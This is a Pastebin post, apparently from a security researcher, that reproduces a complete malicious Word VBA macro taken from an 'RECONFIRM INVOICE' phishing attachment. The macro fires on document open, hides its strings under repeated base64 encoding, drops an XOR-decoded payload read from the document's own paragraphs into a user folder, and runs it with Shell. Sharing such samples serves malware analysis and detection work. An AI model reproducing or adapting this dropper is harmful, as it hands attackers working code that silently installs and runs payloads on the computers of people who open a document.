API tools faq
paste
Neonprimetime

Malicious VBA Macro SUBJECT: RECONFIRM INVOICE

Neonprimetime
Jun 7th, 2016
279
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 10.82 KB | None | 0 0
raw download clone embed print report
  1. Raw Malicious VBA Macro from Email
  2. *******
  3. SUBJECT: RECONFIRM INVOICE
  4. ATTACHMENT: RECONFIRM INVOICE.doc
  5. *******
  6. *******
  7.  
  8. Attribute VB_Name = "NewMacros"
  9. Option Explicit
  10.  
  11. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOneMask = 16515072
  12. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHTwoMask = 258048
  13. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHThreeMask = 4032
  14. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHFourMask = 63
  15.  
  16. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask = 16711680
  17. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHMidMask = 65280
  18. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHLowMask = 255
  19.  
  20. Private Const MNAJSAQQQQQQ18 = 262144
  21. Private Const MNAJSAQQQQQQ12 = 4096
  22. Private Const MNAJSAQQQQQQ6 = 64
  23. Private Const MNAJSAQQQQQQ8 = 256
  24. Private Const MNAJSAQQQQQQ16 = 65536
  25.  
  26. Public Function Encode64(sString As String) As String
  27.  
  28.     Dim bTrans(63) As Byte, OOOPOOOOPOOOO8(255) As Long, OOOPOOOOPOOOO16(255) As Long, bOut() As Byte, bIn() As Byte
  29.     Dim BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB As Long, lTrip As Long, iPad As Integer, lLen As Long, mnAjUYt As Long, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA As Long, lOutSize As Long
  30.  
  31.     For mnAjUYt = 0 To 63
  32.         Select Case mnAjUYt
  33.             Case 0 To 25
  34.                 bTrans(mnAjUYt) = 65 + mnAjUYt
  35.             Case 26 To 51
  36.                 bTrans(mnAjUYt) = 71 + mnAjUYt
  37.             Case 52 To 61
  38.                 bTrans(mnAjUYt) = mnAjUYt - 4
  39.             Case 62
  40.                 bTrans(mnAjUYt) = 43
  41.             Case 63
  42.                 bTrans(mnAjUYt) = 47
  43.         End Select
  44.     Next mnAjUYt
  45.  
  46.     For mnAjUYt = 0 To 255
  47.         OOOPOOOOPOOOO8(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ8
  48.         OOOPOOOOPOOOO16(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ16
  49.     Next mnAjUYt
  50.  
  51.     iPad = Len(sString) Mod 3
  52.     If iPad Then
  53.         iPad = 3 - iPad
  54.         sString = sString & String(iPad, Chr(0))
  55.     End If
  56.  
  57.     bIn = StrConv(sString, vbFromUnicode)
  58.     lLen = ((UBound(bIn) + 1) \ 3) * 4
  59.     mnAjUYt = lLen \ 72
  60.     lOutSize = ((mnAjUYt * 2) + lLen) - 1
  61.     ReDim bOut(lOutSize)
  62.  
  63.     lLen = 0
  64.  
  65.     For BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = LBound(bIn) To UBound(bIn) Step 3
  66.         lTrip = OOOPOOOOPOOOO16(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB)) + OOOPOOOOPOOOO8(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 1)) + bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 2)
  67.         mnAjUYt = lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOneMask
  68.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) = bTrans(mnAjUYt \ MNAJSAQQQQQQ18)
  69.         mnAjUYt = lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHTwoMask
  70.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 1) = bTrans(mnAjUYt \ MNAJSAQQQQQQ12)
  71.         mnAjUYt = lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHThreeMask
  72.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 2) = bTrans(mnAjUYt \ MNAJSAQQQQQQ6)
  73.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 3) = bTrans(lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHFourMask)
  74.         If lLen = 68 Then
  75.             bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 4) = 13
  76.             bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 5) = 10
  77.             lLen = 0
  78.             AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 6
  79.         Else
  80.             lLen = lLen + 4
  81.             AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 4
  82.         End If
  83.     Next BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  84.  
  85.     If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2
  86.  
  87.     If iPad = 1 Then
  88.         bOut(lOutSize) = 61
  89.     ElseIf iPad = 2 Then
  90.         bOut(lOutSize) = 61
  91.         bOut(lOutSize - 1) = 61
  92.     End If
  93.  
  94.     Encode64 = StrConv(bOut, vbUnicode)
  95.  
  96. End Function
  97.  
  98. Public Function sss(sString As String) As String
  99.  
  100.     Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, OOOPOOOOPOOOO6(63) As Long, OOOPOOOOPOOOO12(63) As Long
  101.     Dim OOOPOOOOPOOOO18(63) As Long, lQuad As Long, iPad As Integer, BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB As Long, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA As Long, sOut As String
  102.     Dim mnAjUYt As Long
  103.  
  104.     sString = Replace(sString, vbCr, vbNullString)
  105.     sString = Replace(sString, vbLf, vbNullString)
  106.  
  107.     mnAjUYt = Len(sString) Mod 4
  108.    
  109.     If InStrRev(sString, "==") Then
  110.         iPad = 2
  111.     ElseIf InStrRev(sString, "=") Then
  112.         iPad = 1
  113.     End If
  114.  
  115.     For mnAjUYt = 0 To 255
  116.         Select Case mnAjUYt
  117.             Case 65 To 90
  118.                 bTrans(mnAjUYt) = mnAjUYt - 65
  119.             Case 97 To 122
  120.                 bTrans(mnAjUYt) = mnAjUYt - 71
  121.             Case 48 To 57
  122.                 bTrans(mnAjUYt) = mnAjUYt + 4
  123.             Case 43
  124.                 bTrans(mnAjUYt) = 62
  125.             Case 47
  126.                 bTrans(mnAjUYt) = 63
  127.         End Select
  128.     Next mnAjUYt
  129.  
  130.     For mnAjUYt = 0 To 63
  131.         OOOPOOOOPOOOO6(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ6
  132.         OOOPOOOOPOOOO12(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ12
  133.         OOOPOOOOPOOOO18(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ18
  134.     Next mnAjUYt
  135.  
  136.     bIn = StrConv(sString, vbFromUnicode)
  137.     ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
  138.  
  139.     For BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = 0 To UBound(bIn) Step 4
  140.         lQuad = OOOPOOOOPOOOO18(bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB))) + OOOPOOOOPOOOO12(bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 1))) + _
  141.                 OOOPOOOOPOOOO6(bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 2))) + bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 3))
  142.         mnAjUYt = lQuad And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask
  143.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) = mnAjUYt \ MNAJSAQQQQQQ16
  144.         mnAjUYt = lQuad And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHMidMask
  145.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 1) = mnAjUYt \ MNAJSAQQQQQQ8
  146.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 2) = lQuad And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHLowMask
  147.         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 3
  148.     Next BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  149.  
  150.     sOut = StrConv(bOut, vbUnicode)
  151.     If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
  152.     sss = sOut
  153.  
  154. End Function
  155.  
  156. Sub AddSpace()
  157. RemoveParagraph
  158. End Sub
  159.  
  160. Sub S1(b As String)
  161. MkDir (sss(Encode64(b)))
  162. End Sub
  163. Sub S2(b As String)
  164. ChDir (sss(Encode64(b)))
  165. End Sub
  166. Sub RemoveParagraph()
  167.     Dim vEnd3855202881 As Integer
  168.     Dim vEnd1859739270 As Integer
  169.     Dim vEnd3491963883 As String
  170.     Dim vEnd349196388399 As String
  171.     Dim vEnd988888527 As String
  172.     Dim vEnd1400215006 As Integer
  173.     Dim vEnd140021500699 As Integer
  174.     Dim vEnd1636671794 As Paragraph
  175.     Dim vEnd961873140 As Long
  176.     Dim vEnd3892361924 As Boolean
  177.     Dim vEnd2384858154 As Integer
  178.     Dim vEnd34919638831 As String
  179.     Dim vEnd3491963883199 As String
  180.     Dim vEnd3120080411 As Byte
  181.     Dim vEnd312008041199 As Byte
  182.     Dim vEnd3569041833 As String
  183.     Dim vEnd4030732206 As String
  184.     vEnd4030732206 = sss(sss(sss(sss(sss(sss(sss("Vm14U1NtVkZNVWhUYms1U1lrVndVbFpyVWtKUFVUMDk=")))))))
  185.     vEnd3569041833 = sss(sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0wd2QyUXlWa1pPVldSWFYwZG9WMVl3Wkc5WFJsbDNXa1JTVjFKdGVGWlZNakExVmpKS1NHVkVRbUZXVjFKSVZtcEJlRmRIVmtWUmJVWlRWbXhzTTFkV1pEUlRNbEpJVm10c2FsSnRVbkJWYlhSM1UxWmtWMXBJY0d4U2JWSllWVzAxVDFsV1NuTmpTRUpXWWxoU00xUnRlR0ZqTVdSMFVteGtUbFp1UWxoV1JscFhWakpHU0ZadVJsSldSM001"))))))))))
  186.     Dim vEnd3465700673 As String
  187.     vEnd988888527 = Environ(sss(sss(sss(sss("VlZaV05GUldXbGRVYTFwV1lrVTFVbFpYY3pWU01VNVdaVVZaUFE9PQ=="))))) + sss(sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0wd2QyVkhVWGhTV0doWVYwZG9XVmx0ZUV0WFJteFZVMjA1VjFadGVGWlZNakExVmpGYWRHVkliRmhoTVVwVVZtcEtTMU5IVmtkaVIwWlhWakZLU1ZkV1pEUlpWMUpYVW01S2FsSnVRbTlaV0hCWFpWWmFjMVp0UmxkTlZuQlhWRlpXVjJGSFZuRlJWR3M5"))))))))))
  188.  
  189.     If Len(dir(vEnd988888527, vbDirectory)) = 0 Then
  190.         S1 (vEnd988888527)
  191.     Else:
  192.         Wipedir (vEnd988888527)
  193.         S1 (vEnd988888527)
  194.     End If
  195.        
  196.     vEnd3491963883 = sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0weGQxSXlSWGRPVldoVVYwZG9WMWx0ZUV0V01XeHlXa1pPYWxac1dqQlVWbEpUWVZVeFYxZHVhRmRTZWtZelZsVmFWMVpWTVVWaGVqQTk=")))))))))
  197.     ChDrive (vEnd988888527)
  198.     S2 (vEnd988888527)
  199.     vEnd1400215006 = FreeFile()
  200.     Open vEnd3491963883 For Binary As vEnd1400215006
  201.     vEnd1859739270 = 0
  202.     For Each vEnd1636671794 In ActiveDocument.Paragraphs
  203.         DoEvents
  204.             vEnd34919638831 = vEnd1636671794.Range.Text
  205.             vEnd961873140 = 1
  206.             vEnd1859739270 = vEnd1859739270 + 1
  207.         If vEnd1859739270 >= 24 Then
  208.             While (vEnd961873140 < Len(vEnd34919638831))
  209.                 vEnd3120080411 = vEnd4030732206 & Mid(vEnd34919638831, vEnd961873140, 2)
  210.                 vEnd3120080411 = vEnd3120080411 Xor &H4C
  211.                 Put #vEnd1400215006, , vEnd3120080411
  212.                 vEnd961873140 = vEnd961873140 + 2
  213.             Wend
  214.         End If
  215.     Next
  216.     Close #vEnd1400215006
  217.     vEnd34919638833 (vEnd3491963883)
  218. End Sub
  219.  
  220.  
  221. Public Sub Wipedir(pppppppppppppppppppppppppp As String)
  222. Dim OOO
  223. Set OOO = CreateObject(sss(sss(sss(sss(sss(sss(sss("Vm0weE5GVXhUWGhWV0d4WFlrZG9WRmxyWkRSVk1XeFlaRVYwYVUxV2NERlpNRnByWVRGYWMxTnJiR0ZTVjFKSVdWZDRTbVF5VGtaaVJtUnBWMGRvVlZkWGRHRmhNVXB5VGxWc1lWSnRhSEJWYWtFd1RVWmFjMVp0Um1wTmJFcEpWa2QwYjJKR1NuVlJhemxWVm14YVYxUnNSVGxRVVQwOQ=="))))))))
  224. If OOO.folderexists(pppppppppppppppppppppppppp) Then
  225. OOO.deletefolder pppppppppppppppppppppppppp
  226. Else
  227. End
  228. End If
  229.  
  230. End Sub
  231. Sub Shits(vbHH As String)
  232. Dim OBsGG
  233. OBsGG = Shell(vbHH, 1)
  234. End Sub
  235. Sub vEnd34919638833(vEnd34919638830 As String)
  236.     Dim vEnd3855202881 As Integer
  237.     Dim vEnd988888527 As String
  238. vEnd988888527 = Environ(sss(sss(sss(sss("VlZaV05GUldXbGRVYTFwV1lrVTFVbFpYY3pWU01VNVdaVVZaUFE9PQ=="))))) + sss(sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0wd2QyVkhVWGhTV0doWVYwZG9XVmx0ZUV0WFJteFZVMjA1VjFadGVGWlZNakExVmpGYWRHVkliRmhoTVVwVVZtcEtTMU5IVmtkaVIwWlhWakZLU1ZkV1pEUlpWMUpYVW01S2FsSnVRbTlaV0hCWFpWWmFjMVp0UmxkTlZuQlhWRlpXVjJGSFZuRlJWR3M5"))))))))))
  239.     ChDrive (vEnd988888527)
  240.     S2 (vEnd988888527)
  241.     Shits (vEnd988888527 + sss(sss(sss(sss("VjBWamVHVnJlSFJXYWxKaFZWUXdPUT09")))))
  242.    
  243. End Sub
  244.  
  245. Sub AutoOpen()
  246. AddSpace
  247. End Sub
  248.  
  249. Private Sub Workbook_Open()
  250. AddSpace
  251. End Sub
  252.  
  253. *******
  254. *******
  255. *******
  256. More FROM @neonprimetime security
  257.  
  258. http://pastebin.com/u/Neonprimetime
  259. https://www.virustotal.com/en/USER/neonprimetime/
  260. https://twitter.com/neonprimetime
  261. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!